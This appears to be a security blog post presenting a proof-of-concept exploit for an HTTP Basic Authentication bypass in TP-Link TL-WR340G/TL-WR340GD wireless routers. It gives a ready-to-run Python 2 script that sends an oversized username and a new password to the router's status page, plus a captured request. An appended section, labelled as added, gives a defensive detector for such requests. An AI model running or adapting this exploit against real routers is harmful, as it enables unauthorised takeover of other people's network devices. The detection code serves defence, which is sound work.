PoC Exploit: TL-WR340G/TL-WR340GD HTTP Basic Authentication Bypass

Yesterday I discovered an HTTP Basic Authentication flaw in the TL-WR340G/TL-WR340GD, specifically in the TL-WR340G, and I will send it to the vendor and then to CVE.

/*
* HTTP Basic Authentication Bypass
* Vuln: 54M Wireless Router
* Model No. TL-WR340G/TL-WR340GD
*
* Original Advisory:
* https://firebitsbr.wordpress.com
*
*  Mauro Risonho de Paula Assumpção aka firebitsbr
*  blog https://firebitsbr.wordpress.com
*  twitter:https://twitter.com/firebitsbr
*/
--
*=========PoC==========
#!/usr/bin/env python
# Python 2 script (uses urllib2)
import urllib2

IP_SERVER = '192.168.1.1'
USERNAME = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
NEW_PASS = 'zoado'

# Register the credentials for the router's Basic authentication realm
auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password('LOGIN(default username & password is admin)',
                          IP_SERVER, USERNAME, NEW_PASS)
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)

# Request the status page of the web interface
response = urllib2.urlopen('http://' + IP_SERVER + '/userRpm/StatusRpm.htm')

/*=========RESPONSE==========
*GET http://192.168.1.1 HTTP/1.1
*Host: 192.168.1.1
*User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 Iceweasel/9.0.1
*Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
*Accept-Language: en-us,en;q=0.5
*Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
*Proxy-Connection: keep-alive
*Referer: http://192.168.1.1/userRpm/StatusRpm.htm
*Authorization: Basic c3RyaWRlcjp0OXdSTm80Vg==
*Content-length: 0
*http://192.168.1.1/userRpm/StatusRpm.htm?Logout=Logout&Login=Login&ReleaseIP=Release&RenewIP=Renew&Connect=Connect&Disconnect=Disconnect&Refresh=Refresh
*/
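A defender-side check for the request pattern in the PoC above, as an added example that is not part of the original post: it decodes the Basic credentials from a raw HTTP request and flags over-long or single-repeated-character usernames. The 64-character threshold, the function names and the sample requests are assumptions constructed for illustration.

```python
import base64
import binascii

MAX_USERNAME_LEN = 64  # assumed threshold; the PoC above sends 127 characters

def basic_credentials(raw_request):
    """Return (username, password) bytes from a raw HTTP request, or None
    if there is no well-formed 'Authorization: Basic' header."""
    for line in raw_request.splitlines()[1:]:      # skip the request line
        name, sep, value = line.partition(":")
        if not sep or name.strip().lower() != "authorization":
            continue
        scheme, _, token = value.strip().partition(" ")
        if scheme.lower() != "basic":
            return None
        try:
            decoded = base64.b64decode(token.strip(), validate=True)
        except (binascii.Error, ValueError):
            return None
        user, colon, password = decoded.partition(b":")
        return (user, password) if colon else None
    return None

def review_request(raw_request, max_len=MAX_USERNAME_LEN):
    """Return a list of findings for one request (empty list = nothing odd)."""
    creds = basic_credentials(raw_request)
    if creds is None:
        return []
    user = creds[0]
    findings = []
    if len(user) > max_len:
        findings.append("username length %d > %d" % (len(user), max_len))
    if len(user) > 8 and len(set(user)) == 1:
        findings.append("username is one repeated byte")
    return findings

def build_request(user, password):
    """Construct a sample request (test data, not captured traffic)."""
    token = base64.b64encode(("%s:%s" % (user, password)).encode()).decode()
    return ("GET /userRpm/StatusRpm.htm HTTP/1.1\r\n"
            "Host: 192.168.1.1\r\n"
            "Authorization: Basic %s\r\n\r\n" % token)

NORMAL = build_request("admin", "admin")          # constructed sample
POC_LIKE = build_request("a" * 127, "zoado")      # constructed sample

if __name__ == "__main__":
    for label, req in (("normal", NORMAL), ("poc-like", POC_LIKE)):
        print(label, review_request(req))
```
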

@firebitsbr